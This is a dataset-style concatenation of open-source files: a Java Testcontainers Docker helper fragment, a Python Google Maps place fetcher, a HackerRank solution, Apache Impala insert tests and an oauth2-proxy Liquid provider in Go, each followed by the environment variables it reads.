log.debug("Failure while checking for mountable file support", e);
return false;
}
}
/**
* Check whether the image is available locally and pull it otherwise
*/
@SneakyThrows
public void checkAndPullImage(DockerClient client, String image) {
List<Image> images = client.listImagesCmd().withImageNameFilter(image).exec();
if (images.isEmpty()) {
client.pullImageCmd(image).exec(new TimeLimitedLoggedPullImageResultCallback(log)).awaitCompletion();
}
}
/**
* @return the IP address of the host running Docker
*/
public String dockerHostIpAddress() {
return getOrInitializeStrategy().getDockerHostIpAddress();
}
public <T> T runInsideDocker(Consumer<CreateContainerCmd> createContainerCmdConsumer, BiFunction<DockerClient, String, T> block) {
// We can't use client() here because it might create an infinite loop
return runInsideDocker(getOrInitializeStrategy().getClient(), createContainerCmdConsumer, block);
}
private <T> T runInsideDocker(DockerClient client, Consumer<CreateContainerCmd> createContainerCmdConsumer, BiFunction<DockerClient, String, T> block) {
checkAndPullImage(client, TINY_IMAGE);
CreateContainerCmd createContainerCmd = client.createContainerCmd(TINY_IMAGE)
.withLabels(DEFAULT_LABELS);
createContainerCmdConsumer.accept(createContainerCmd);
String id = createContainerCmd.exec().getId();
try {
client.startContainerCmd(id).exec();
return block.apply(client, id);
} finally {
try {
client.removeContainerCmd(id).withRemoveVolumes(true).withForce(true).exec();
} catch (NotFoundException | InternalServerErrorException e) {
log.debug("Swallowed exception while removing container", e);
}
}
}
@VisibleForTesting
static class DiskSpaceUsage {
Optional<Long> availableMB = Optional.empty();
Optional<Integer> usedPercent = Optional.empty();
}
@VisibleForTesting
DiskSpaceUsage parseAvailableDiskSpace(String dfOutput) {
DiskSpaceUsage df = new DiskSpaceUsage();
String[] lines = dfOutput.split("\n");
for (String line : lines) {
String[] fields = line.split("\\s+");
if (fields.length > 5 && fields[5].equals("/")) {
long availableKB = Long.parseLong(fields[3]);
df.availableMB = Optional.of(availableKB / 1024L);
df.usedPercent = Optional.of(Integer.valueOf(fields[4].replace("%", "")));
break;
}
}
return df;
}
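// Illustrative `df -P` line (hypothetical values): "overlay 103079200 8921000 94158200 9% /"
// For the root mount, parseAvailableDiskSpace reads fields[3] (available KB) and
// fields[4] (use%), yielding availableMB=91951 and usedPercent=9.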
/**
* @return the docker API version of the daemon that we have connected to
*/
public String getActiveApiVersion() {
client();
return activeApiVersion;
}
/**
* @return the docker execution driver of the daemon that we have connected to
*/
public String getActiveExecutionDriver() {
client();
return activeExecutionDriver;
}
/**
* @param providerStrategyClass a class that extends {@link DockerMachineClientProviderStrategy}
* @return whether or not the currently active strategy is of the provided type
*/
public boolean isUsing(Class<? extends DockerClientProviderStrategy> providerStrategyClass) {
return strategy != null && providerStrategyClass.isAssignableFrom(this.strategy.getClass());
}
}
| [
"\"TESTCONTAINERS_RYUK_DISABLED\""
] | [] | [
"TESTCONTAINERS_RYUK_DISABLED"
] | [] | ["TESTCONTAINERS_RYUK_DISABLED"] | java | 1 | 0 | |
kuwala/pipelines/google-poi/src/utils/google.py | import json
import os
from time import sleep
from quart import abort
import requests
from requests.exceptions import ConnectionError
from src.utils.array_utils import get_nested_value
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/54.0.2840.98 Safari/537.36"
}
def fetch_data(url, params):
proxy = os.environ.get("PROXY_ADDRESS")
proxies = dict(http=proxy, https=proxy)
sleep_time = 1
while True:
try:
response = requests.get(
url, params=params, proxies=proxies if proxy else None, headers=headers
)
if response.ok:
break
elif sleep_time < 60:
sleep(sleep_time)
sleep_time *= 2
else:
abort(429, "Too many requests. Please check the proxy on the server")
except ConnectionError:
if sleep_time < 60:
sleep(sleep_time)
sleep_time *= 2
else:
abort(429, "Too many requests. Please check the proxy on the server")
return response
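# Behavior sketch: on connection errors or non-OK responses, fetch_data retries with
# exponential backoff (1s, 2s, 4s, ... up to 32s); once the next delay would reach 60s
# it aborts with HTTP 429 instead of retrying further.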
def search(query):
"""
Get the data for a given query string
:param str query: String that is used for the search (name + address or place_id:{place_id})
:return: The query string with its corresponding result
"""
url = "https://www.google.de/search"
params = {
"tbm": "map",
"tch": 1,
"hl": "en",
"q": query,
"pb": "!4m12!1m3!1d4005.9771522653964!2d-122.42072974863942!3d37.8077459796541!2m3!1f0!2f0!3f0!3m2!1i1125!2i976"
"!4f13.1!7i20!10b1!12m6!2m3!5m1!6e2!20e3!10b1!16b1!19m3!2m2!1i392!2i106!20m61!2m2!1i203!2i100!3m2!2i4!5b1"
"!6m6!1m2!1i86!2i86!1m2!1i408!2i200!7m46!1m3!1e1!2b0!3e3!1m3!1e2!2b1!3e2!1m3!1e2!2b0!3e3!1m3!1e3!2b0!3e3!"
"1m3!1e4!2b0!3e3!1m3!1e8!2b0!3e3!1m3!1e3!2b1!3e2!1m3!1e9!2b1!3e2!1m3!1e10!2b0!3e3!1m3!1e10!2b1!3e2!1m3!1e"
"10!2b0!3e4!2b1!4b1!9b0!22m6!1sa9fVWea_MsX8adX8j8AE%3A1!2zMWk6Mix0OjExODg3LGU6MSxwOmE5ZlZXZWFfTXNYOGFkWDh"
"qOEFFOjE!7e81!12e3!17sa9fVWea_MsX8adX8j8AE%3A564!18e15!24m15!2b1!5m4!2b1!3b1!5b1!6b1!10m1!8e3!17b1!24b1!"
"25b1!26b1!30m1!2b1!36b1!26m3!2m2!1i80!2i92!30m28!1m6!1m2!1i0!2i0!2m2!1i458!2i976!1m6!1m2!1i1075!2i0!2m2!"
"1i1125!2i976!1m6!1m2!1i0!2i0!2m2!1i1125!2i20!1m6!1m2!1i0!2i956!2m2!1i1125!2i976!37m1!1e81!42b1!47m0!49m1"
"!3b1",
}
response = fetch_data(url, params)
data = response.text.split('/*""*/')[0]
jend = data.rfind("}")
if jend >= 0:
data = data[: jend + 1]
jdata = json.loads(data)["d"]
jdata = json.loads(jdata[4:])
# Get info from the result array; has to be adapted if the API changes
data = get_nested_value(jdata, 0, 1, 0, 14)
# Check second result
if data is None:
data = get_nested_value(jdata, 0, 1, 1, 14)
return dict(query=query, data=data)
def get_by_id(pb_id):
"""
Get the data for a given id
:param str pb_id: Id that is used to retrieve a specific place via the pb query parameter
:return: The id with its corresponding result
"""
url = "https://www.google.com/maps/preview/place"
params = {
"authuser": 0,
"hl": "en",
"gl": "en",
"pb": f"!1m17!1s{pb_id}!3m12!1m3!1d4005.9771522653964!2d-122.42072974863942!3d37.8077459796541!2m3!1f0!2f0"
"!3f0!3m2!1i1440!2i414!4f13.1!4m2!3d-122.42072974863942!4d37.8077459796541!12m4!2m3!1i360!2i120!4i8"
"!13m65!2m2!1i203!2i100!3m2!2i4!5b1!6m6!1m2!1i86!2i86!1m2!1i408!2i240!7m50!1m3!1e1!2b0!3e3!1m3!1e2!2b1"
"!3e2!1m3!1e2!2b0!3e3!1m3!1e3!2b0!3e3!1m3!1e8!2b0!3e3!1m3!1e3!2b1!3e2!1m3!1e10!2b0!3e3!1m3!1e10!2b1"
"!3e2!1m3!1e9!2b1!3e2!1m3!1e10!2b0!3e3!1m3!1e10!2b1!3e2!1m3!1e10!2b0!3e4!2b1!4b1!9b0!14m5"
"!1sTpKbYLDlD47FUrPBo4gL!4m1!2i5210!7e81!12e3!15m55!1m17!4e2!13m7!2b1!3b1!4b1!6i1!8b1!9b1!20b1!18m7"
"!3b1!4b1!5b1!6b1!9b1!13b1!14b0!2b1!5m5!2b1!3b1!5b1!6b1!7b1!10m1!8e3!14m1!3b1!17b1!20m2!1e3!1e6!24b1"
"!25b1!26b1!29b1!30m1!2b1!36b1!43b1!52b1!54m1!1b1!55b1!56m2!1b1!3b1!65m5!3m4!1m3!1m2!1i224!2i298!89b1"
"!21m28!1m6!1m2!1i0!2i0!2m2!1i458!2i414!1m6!1m2!1i1390!2i0!2m2!1i1440!2i414!1m6!1m2!1i0!2i0!2m2!1i1440"
"!2i20!1m6!1m2!1i0!2i394!2m2!1i1440!2i414!22m1!1e81!29m0!30m1!3b1!34m2!7b1!10b1!37i557",
}
response = fetch_data(url, params)
data = response.text.split("'\n")[1]
data = json.loads(data)
return dict(id=pb_id, data=data)
| [] | [] | [
"PROXY_ADDRESS"
] | [] | ["PROXY_ADDRESS"] | python | 1 | 0 | |
utopian-tree.py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the utopianTree function below.
def utopianTree(n):
h = 1
for i in range(1, n + 1):
if i % 2 == 1:
h *= 2
else:
h += 1
return h
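# Example: for n = 4 the height follows 1 -> 2 -> 3 -> 6 -> 7 (double in spring,
# +1 in summer), so utopianTree(4) returns 7.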
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
t = int(input())
for t_itr in range(t):
n = int(input())
result = utopianTree(n)
fptr.write(str(result) + '\n')
fptr.close()
| [] | [] | [
"OUTPUT_PATH"
] | [] | ["OUTPUT_PATH"] | python | 1 | 0 | |
tests/query_test/test_insert.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Targeted Impala insert tests
import os
import pytest
import re
from testdata.common import widetable
from tests.common.impala_cluster import ImpalaCluster
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.parametrize import UniqueDatabase
from tests.common.skip import SkipIfABFS, SkipIfEC, SkipIfLocal, \
SkipIfHive2, SkipIfNotHdfsMinicluster, SkipIfS3, SkipIfDockerizedCluster
from tests.common.test_dimensions import (
create_exec_option_dimension,
create_uncompressed_text_dimension)
from tests.common.test_result_verifier import (
QueryTestResult,
parse_result_rows)
from tests.common.test_vector import ImpalaTestDimension
from tests.verifiers.metric_verifier import MetricVerifier
PARQUET_CODECS = ['none', 'snappy', 'gzip', 'zstd', 'lz4']
class TestInsertQueries(ImpalaTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestInsertQueries, cls).add_test_dimensions()
# Fix the exec_option vector to have a single value. This is needed should we decide
# to run the insert tests in parallel (otherwise there will be two tests inserting
# into the same table at the same time for the same file format).
# TODO: When we do decide to run these tests in parallel we could create unique temp
# tables for each test case to resolve the concurrency problems.
if cls.exploration_strategy() == 'core':
cls.ImpalaTestMatrix.add_dimension(create_exec_option_dimension(
cluster_sizes=[0], disable_codegen_options=[True, False], batch_sizes=[0],
sync_ddl=[0]))
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
else:
cls.ImpalaTestMatrix.add_dimension(create_exec_option_dimension(
cluster_sizes=[0], disable_codegen_options=[True, False], batch_sizes=[0, 1, 16],
sync_ddl=[0, 1]))
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension("compression_codec", *PARQUET_CODECS))
# Insert is currently only supported for text and parquet
# For parquet, we want to iterate through all the compression codecs
# TODO: each column in parquet can have a different codec. We could
# test all the codecs in one table/file with some additional flags.
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format == 'parquet' or \
(v.get_value('table_format').file_format == 'text' and \
v.get_value('compression_codec') == 'none'))
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').compression_codec == 'none')
# Only test other batch sizes for uncompressed parquet to keep the execution time
# within reasonable bounds.
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('exec_option')['batch_size'] == 0 or \
(v.get_value('table_format').file_format == 'parquet' and \
v.get_value('compression_codec') == 'none'))
@pytest.mark.execute_serially
def test_insert_large_string(self, vector, unique_database):
"""Test handling of large strings in inserter and scanner."""
if "-Xcheck:jni" in os.environ.get("LIBHDFS_OPTS", ""):
pytest.skip("Test unreasonably slow with JNI checking.")
table_name = unique_database + ".insert_largestring"
self.client.set_configuration_option("mem_limit", "4gb")
file_format = vector.get_value('table_format').file_format
if file_format == "parquet":
stored_as = file_format
else:
assert file_format == "text"
stored_as = "textfile"
self.client.execute("""
create table {0}
stored as {1} as
select repeat('AZ', 128 * 1024 * 1024) as s""".format(table_name, stored_as))
# Make sure it produces correct result when materializing no tuples.
result = self.client.execute("select count(*) from {0}".format(table_name))
assert result.data == ["1"]
# Make sure it got the length right.
result = self.client.execute("select length(s) from {0}".format(table_name))
assert result.data == [str(2 * 128 * 1024 * 1024)]
# Spot-check the data.
result = self.client.execute(
"select substr(s, 200 * 1024 * 1024, 5) from {0}".format(table_name))
assert result.data == ["ZAZAZ"]
# IMPALA-7648: test that we gracefully fail when there is not enough memory
# to fit the scanned string in memory.
self.client.set_configuration_option("mem_limit", "50M")
try:
self.client.execute("select s from {0}".format(table_name))
assert False, "Expected query to fail"
except Exception, e:
assert "Memory limit exceeded" in str(e)
@classmethod
def setup_class(cls):
super(TestInsertQueries, cls).setup_class()
@UniqueDatabase.parametrize(sync_ddl=True)
# Erasure coding doesn't respect memory limit
@SkipIfEC.fix_later
# ABFS partition names cannot end in periods
@SkipIfABFS.file_or_folder_name_ends_with_period
def test_insert(self, vector, unique_database):
if (vector.get_value('table_format').file_format == 'parquet'):
vector.get_value('exec_option')['COMPRESSION_CODEC'] = \
vector.get_value('compression_codec')
self.run_test_case('QueryTest/insert', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1,
test_file_vars={'$ORIGINAL_DB': ImpalaTestSuite
.get_db_name_from_format(vector.get_value('table_format'))})
@SkipIfHive2.acid
@UniqueDatabase.parametrize(sync_ddl=True)
def test_acid_insert(self, vector, unique_database):
exec_options = vector.get_value('exec_option')
file_format = vector.get_value('table_format').file_format
if (file_format == 'parquet'):
exec_options['COMPRESSION_CODEC'] = vector.get_value('compression_codec')
exec_options['DEFAULT_FILE_FORMAT'] = file_format
self.run_test_case('QueryTest/acid-insert', vector, unique_database,
multiple_impalad=exec_options['sync_ddl'] == 1)
@SkipIfHive2.acid
@UniqueDatabase.parametrize(sync_ddl=True)
def test_acid_nonacid_insert(self, vector, unique_database):
self.run_test_case('QueryTest/acid-nonacid-insert', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1)
@SkipIfHive2.acid
@UniqueDatabase.parametrize(sync_ddl=True)
def test_acid_insert_fail(self, vector, unique_database):
self.run_test_case('QueryTest/acid-insert-fail', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1)
@UniqueDatabase.parametrize(sync_ddl=True)
@pytest.mark.execute_serially
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
def test_insert_mem_limit(self, vector, unique_database):
if (vector.get_value('table_format').file_format == 'parquet'):
vector.get_value('exec_option')['COMPRESSION_CODEC'] = \
vector.get_value('compression_codec')
self.run_test_case('QueryTest/insert-mem-limit', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1,
test_file_vars={'$ORIGINAL_DB': ImpalaTestSuite
.get_db_name_from_format(vector.get_value('table_format'))})
# IMPALA-7023: These queries can linger and use up memory, causing subsequent
# tests to hit memory limits. Wait for some time to allow the query to
# be reclaimed.
verifiers = [MetricVerifier(i.service)
for i in ImpalaCluster.get_e2e_test_cluster().impalads]
for v in verifiers:
v.wait_for_metric("impala-server.num-fragments-in-flight", 0, timeout=180)
@UniqueDatabase.parametrize(sync_ddl=True)
def test_insert_overwrite(self, vector, unique_database):
self.run_test_case('QueryTest/insert_overwrite', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1,
test_file_vars={'$ORIGINAL_DB': ImpalaTestSuite
.get_db_name_from_format(vector.get_value('table_format'))})
@UniqueDatabase.parametrize(sync_ddl=True)
def test_insert_bad_expr(self, vector, unique_database):
# The test currently relies on codegen being disabled to trigger an error in
# the output expression of the table sink.
if vector.get_value('exec_option')['disable_codegen']:
self.run_test_case('QueryTest/insert_bad_expr', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1,
test_file_vars={'$ORIGINAL_DB': ImpalaTestSuite
.get_db_name_from_format(vector.get_value('table_format'))})
@UniqueDatabase.parametrize(sync_ddl=True)
def test_insert_random_partition(self, vector, unique_database):
"""Regression test for IMPALA-402: partitioning by rand() leads to strange behaviour
or crashes."""
self.run_test_case('QueryTest/insert-random-partition', vector, unique_database,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1)
class TestInsertWideTable(ImpalaTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestInsertWideTable, cls).add_test_dimensions()
# Only vary codegen
cls.ImpalaTestMatrix.add_dimension(create_exec_option_dimension(
cluster_sizes=[0], disable_codegen_options=[True, False], batch_sizes=[0]))
# Inserts only supported on text and parquet
# TODO: Enable 'text'/codec once the compressed text writers are in.
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format == 'parquet' or \
v.get_value('table_format').file_format == 'text')
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').compression_codec == 'none')
# Don't run on core. This test is very slow (IMPALA-864) and we are unlikely to
# regress here.
if cls.exploration_strategy() == 'core':
cls.ImpalaTestMatrix.add_constraint(lambda v: False)
@SkipIfLocal.parquet_file_size
def test_insert_wide_table(self, vector, unique_database):
table_format = vector.get_value('table_format')
# Text can't handle as many columns as Parquet (codegen takes forever)
num_cols = 1000 if table_format.file_format == 'text' else 2000
table_name = unique_database + ".insert_widetable"
if vector.get_value('exec_option')['disable_codegen']:
table_name += "_codegen_disabled"
col_descs = widetable.get_columns(num_cols)
create_stmt = "CREATE TABLE " + table_name + "(" + ','.join(col_descs) + ")"
if vector.get_value('table_format').file_format == 'parquet':
create_stmt += " stored as parquet"
self.client.execute(create_stmt)
# Get a single row of data
col_vals = widetable.get_data(num_cols, 1, quote_strings=True)[0]
insert_stmt = "INSERT INTO " + table_name + " VALUES(" + col_vals + ")"
self.client.execute(insert_stmt)
result = self.client.execute("select count(*) from " + table_name)
assert result.data == ["1"]
result = self.client.execute("select * from " + table_name)
types = result.column_types
labels = result.column_labels
expected = QueryTestResult([col_vals], types, labels, order_matters=False)
actual = QueryTestResult(parse_result_rows(result), types, labels, order_matters=False)
assert expected == actual
class TestInsertPartKey(ImpalaTestSuite):
"""Regression test for IMPALA-875"""
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestInsertPartKey, cls).add_test_dimensions()
# Only run for a single table type
cls.ImpalaTestMatrix.add_dimension(create_exec_option_dimension(
cluster_sizes=[0], disable_codegen_options=[False], batch_sizes=[0],
sync_ddl=[1]))
cls.ImpalaTestMatrix.add_constraint(lambda v:
(v.get_value('table_format').file_format == 'text'))
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').compression_codec == 'none')
@pytest.mark.execute_serially
def test_insert_part_key(self, vector):
"""Test that partition column exprs are cast to the correct type. See IMPALA-875."""
self.run_test_case('QueryTest/insert_part_key', vector,
multiple_impalad=vector.get_value('exec_option')['sync_ddl'] == 1)
class TestInsertNullQueries(ImpalaTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestInsertNullQueries, cls).add_test_dimensions()
# Fix the exec_option vector to have a single value. This is needed should we decide
# to run the insert tests in parallel (otherwise there will be two tests inserting
# into the same table at the same time for the same file format).
# TODO: When we do decide to run these tests in parallel we could create unique temp
# tables for each test case to resolve the concurrency problems.
cls.ImpalaTestMatrix.add_dimension(create_exec_option_dimension(
cluster_sizes=[0], disable_codegen_options=[False], batch_sizes=[0]))
# These tests only make sense for inserting into a text table with special
# logic to handle all the possible ways NULL needs to be written as ascii
cls.ImpalaTestMatrix.add_constraint(lambda v:\
(v.get_value('table_format').file_format == 'text' and \
v.get_value('table_format').compression_codec == 'none'))
@classmethod
def setup_class(cls):
super(TestInsertNullQueries, cls).setup_class()
def test_insert_null(self, vector, unique_database):
self.run_test_case('QueryTest/insert_null', vector, unique_database,
test_file_vars={'$ORIGINAL_DB': ImpalaTestSuite
.get_db_name_from_format(vector.get_value('table_format'))})
class TestInsertFileExtension(ImpalaTestSuite):
"""Tests that files written to a table have the correct file extension. Asserts that
Parquet files end with .parq and text files end with .txt."""
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
cls.ImpalaTestMatrix.add_dimension(ImpalaTestDimension(
'table_format_and_file_extension',
*[('parquet', '.parq'), ('textfile', '.txt')]))
@classmethod
def setup_class(cls):
super(TestInsertFileExtension, cls).setup_class()
def test_file_extension(self, vector, unique_database):
table_format = vector.get_value('table_format_and_file_extension')[0]
file_extension = vector.get_value('table_format_and_file_extension')[1]
table_name = "{0}_table".format(table_format)
ctas_query = "create table {0}.{1} stored as {2} as select 1".format(
unique_database, table_name, table_format)
self.execute_query_expect_success(self.client, ctas_query)
for path in self.filesystem_client.ls("test-warehouse/{0}.db/{1}".format(
unique_database, table_name)):
if not path.startswith('_'): assert path.endswith(file_extension)
class TestInsertHdfsWriterLimit(ImpalaTestSuite):
"""Test to make sure writer fragment instances are distributed evenly when using max
hdfs_writers query option."""
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestInsertHdfsWriterLimit, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:
(v.get_value('table_format').file_format == 'parquet'))
@UniqueDatabase.parametrize(sync_ddl=True)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
def test_insert_writer_limit(self, unique_database):
# Root internal (non-leaf) fragment.
query = "create table {0}.test1 as select int_col from " \
"functional_parquet.alltypes".format(unique_database)
self.__run_insert_and_verify_instances(query, max_fs_writers=2, mt_dop=0,
expected_num_instances_per_host=[1, 2, 2])
# Root coordinator fragment.
query = "create table {0}.test2 as select int_col from " \
"functional_parquet.alltypes limit 100000".format(unique_database)
self.__run_insert_and_verify_instances(query, max_fs_writers=2, mt_dop=0,
expected_num_instances_per_host=[1, 1, 2])
# Root scan fragment. Instance count within limit.
query = "create table {0}.test3 as select int_col from " \
"functional_parquet.alltypes".format(unique_database)
self.__run_insert_and_verify_instances(query, max_fs_writers=4, mt_dop=0,
expected_num_instances_per_host=[1, 1, 1])
@UniqueDatabase.parametrize(sync_ddl=True)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
def test_mt_dop_writer_limit(self, unique_database):
# Root internal (non-leaf) fragment.
query = "create table {0}.test1 as select int_col from " \
"functional_parquet.alltypes".format(unique_database)
self.__run_insert_and_verify_instances(query, max_fs_writers=11, mt_dop=10,
expected_num_instances_per_host=[11, 12, 12])
# Root coordinator fragment.
query = "create table {0}.test2 as select int_col from " \
"functional_parquet.alltypes limit 100000".format(unique_database)
self.__run_insert_and_verify_instances(query, max_fs_writers=2, mt_dop=10,
expected_num_instances_per_host=[8, 8, 9])
# Root scan fragment. Instance count within limit.
query = "create table {0}.test3 as select int_col from " \
"functional_parquet.alltypes".format(unique_database)
self.__run_insert_and_verify_instances(query, max_fs_writers=30, mt_dop=10,
expected_num_instances_per_host=[8, 8, 8])
def __run_insert_and_verify_instances(self, query, max_fs_writers, mt_dop,
expected_num_instances_per_host):
self.client.set_configuration_option("max_fs_writers", max_fs_writers)
self.client.set_configuration_option("mt_dop", mt_dop)
# Test depends on both planner and scheduler to see the same state of the cluster
# having 3 executors, so to reduce flakiness we make sure all 3 executors are up
# and running.
self.impalad_test_service.wait_for_metric_value("cluster-membership.backends.total",
3)
result = self.client.execute(query)
assert 'HDFS WRITER' in result.exec_summary[0]['operator'], result.runtime_profile
assert int(result.exec_summary[0]['num_instances']) <= int(
max_fs_writers), result.runtime_profile
regex = r'Per Host Number of Fragment Instances' \
r':.*?\((.*?)\).*?\((.*?)\).*?\((.*?)\).*?\n'
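# Illustrative (assumed) profile line: "Per Host Number of Fragment Instances:
# h1:22000(2) h2:22001(2) h3:22002(1)" -> the regex captures ("2", "2", "1").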
matches = re.findall(regex, result.runtime_profile)
assert len(matches) == 1 and len(matches[0]) == 3, result.runtime_profile
num_instances_per_host = [int(i) for i in matches[0]]
num_instances_per_host.sort()
expected_num_instances_per_host.sort()
assert num_instances_per_host == expected_num_instances_per_host, \
result.runtime_profile
self.client.clear_configuration()
| [] | [] | [
"LIBHDFS_OPTS"
] | [] | ["LIBHDFS_OPTS"] | python | 1 | 0 | |
providers/liquid.go | package providers
import (
"bytes"
"context"
"errors"
"fmt"
"log"
"net/url"
"os"
"time"
"github.com/oauth2-proxy/oauth2-proxy/v7/pkg/apis/sessions"
"github.com/oauth2-proxy/oauth2-proxy/v7/pkg/requests"
)
/* LiquidProvider type has a pointer to a ProviderData type, which stores
the login, redeem and profile urls as well as the "read" scope. The scheme
(which is http or https) and host are taken from the env variables. The
provider is very similar to the DigitalOcean provider. */
type LiquidProvider struct {
*ProviderData
}
var _ Provider = (*LiquidProvider)(nil)
var (
LiquidScheme = os.Getenv("LIQUID_HTTP_PROTOCOL")
LiquidHost = os.Getenv("LIQUID_DOMAIN")
)
const (
LiquidProviderName = "Liquid"
LiquidDefaultScope = "read"
)
var (
LiquidDefaultLoginURL = &url.URL{
Scheme: LiquidScheme,
Host: LiquidHost,
Path: "/o/authorize/",
}
LiquidDefaultRedeemURL = &url.URL{
Scheme: LiquidScheme,
Host: LiquidHost,
Path: "/o/token/",
}
LiquidDefaultProfileURL = &url.URL{
Scheme: LiquidScheme,
Host: LiquidHost,
Path: "/accounts/profile",
}
)
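// Illustrative (hypothetical env values): with LIQUID_HTTP_PROTOCOL=https and
// LIQUID_DOMAIN=liquid.example.org, LiquidDefaultLoginURL renders as
// "https://liquid.example.org/o/authorize/".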
var LiquidDefaultValidationURL, _ = url.Parse(os.Getenv("OAUTH2_PROXY_PROFILE_URL"))
// NewLiquidProvider initiates a new LiquidProvider
func NewLiquidProvider(p *ProviderData) *LiquidProvider {
p.setProviderDefaults(providerDefaults{
name: LiquidProviderName,
loginURL: LiquidDefaultLoginURL,
redeemURL: LiquidDefaultRedeemURL,
profileURL: LiquidDefaultProfileURL,
validateURL: LiquidDefaultValidationURL,
scope: LiquidDefaultScope,
})
return &LiquidProvider{ProviderData: p}
}
// Instead of implementing GetEmailAddress and GetUserName (each with their own GET request...)
// we just copy/paste the Redeem method from provider_default and set all the SessionState fields
// there.
func (p *LiquidProvider) Redeem(ctx context.Context, redirectURL, code string) (s *sessions.SessionState, err error) {
if code == "" {
err = errors.New("missing code")
return
}
clientSecret, err := p.GetClientSecret()
if err != nil {
return
}
params := url.Values{}
params.Add("redirect_uri", redirectURL)
params.Add("client_id", p.ClientID)
params.Add("client_secret", clientSecret)
params.Add("code", code)
params.Add("grant_type", "authorization_code")
if p.ProtectedResource != nil && p.ProtectedResource.String() != "" {
params.Add("resource", p.ProtectedResource.String())
}
result := requests.New(p.RedeemURL.String()).
WithContext(ctx).
WithMethod("POST").
WithBody(bytes.NewBufferString(params.Encode())).
SetHeader("Content-Type", "application/x-www-form-urlencoded").
Do()
if result.Error() != nil {
return nil, result.Error()
}
// blindly try json and x-www-form-urlencoded
var jsonResponse struct {
AccessToken string `json:"access_token"`
}
err = result.UnmarshalInto(&jsonResponse)
if err == nil {
s = &sessions.SessionState{
AccessToken: jsonResponse.AccessToken,
}
err = p.populateSession(ctx, s)
return
}
var v url.Values
v, err = url.ParseQuery(string(result.Body()))
if err != nil {
return
}
if a := v.Get("access_token"); a != "" {
created := time.Now()
s = &sessions.SessionState{AccessToken: a, CreatedAt: &created}
err = p.populateSession(ctx, s)
} else {
err = fmt.Errorf("no access token found %s", result.Body())
}
return
}
// This sets up SessionState with the user data from our profile ID.
// The translation might be prettier with more annotated types,
// see the gitlab implementation.
func (p *LiquidProvider) populateSession(ctx context.Context, s *sessions.SessionState) error {
if s.AccessToken == "" {
return errors.New("missing access token")
}
json, err := requests.New(p.ProfileURL.String()).
WithContext(ctx).
WithHeaders(makeOIDCHeader(s.AccessToken)).
Do().
UnmarshalJSON()
	if err != nil {
		return err
	}
s.User, err = json.GetPath("id").String()
	if err != nil {
		return err
	}
log.Printf("LOGGING IN %s!\n", s.User)
// hypothesis user header hack
var liquidHeader bool
_, liquidHeader = os.LookupEnv("LIQUID_ENABLE_HYPOTHESIS_HEADERS")
if liquidHeader {
s.User = "acct:" + s.User + "@" + os.Getenv("LIQUID_DOMAIN")
}
s.Email, err = json.GetPath("email").String()
	if err != nil {
		return err
	}
log.Printf("Email %s!\n", s.Email)
s.PreferredUsername, err = json.GetPath("name").String()
	if err != nil {
		return err
	}
	s.Groups, err = json.GetPath("roles").StringArray()
	if err != nil {
		return err
	}
	log.Printf("Groups %v!\n", s.Groups)
return nil
}
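// With LIQUID_ENABLE_HYPOTHESIS_HEADERS set, a profile id such as "jdoe" becomes
// "acct:jdoe@liquid.example.org" (illustrative domain; the real one comes from
// LIQUID_DOMAIN).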
// ValidateSession validates the AccessToken
func (p *LiquidProvider) ValidateSession(ctx context.Context, s *sessions.SessionState) bool {
return validateToken(ctx, p, s.AccessToken, makeOIDCHeader(s.AccessToken))
}
| [
"\"LIQUID_HTTP_PROTOCOL\"",
"\"LIQUID_DOMAIN\"",
"\"OAUTH2_PROXY_PROFILE_URL\"",
"\"LIQUID_DOMAIN\""
] | [] | [
"LIQUID_HTTP_PROTOCOL",
"OAUTH2_PROXY_PROFILE_URL",
"LIQUID_DOMAIN"
] | [] | ["LIQUID_HTTP_PROTOCOL", "OAUTH2_PROXY_PROFILE_URL", "LIQUID_DOMAIN"] | go | 3 | 0 | |
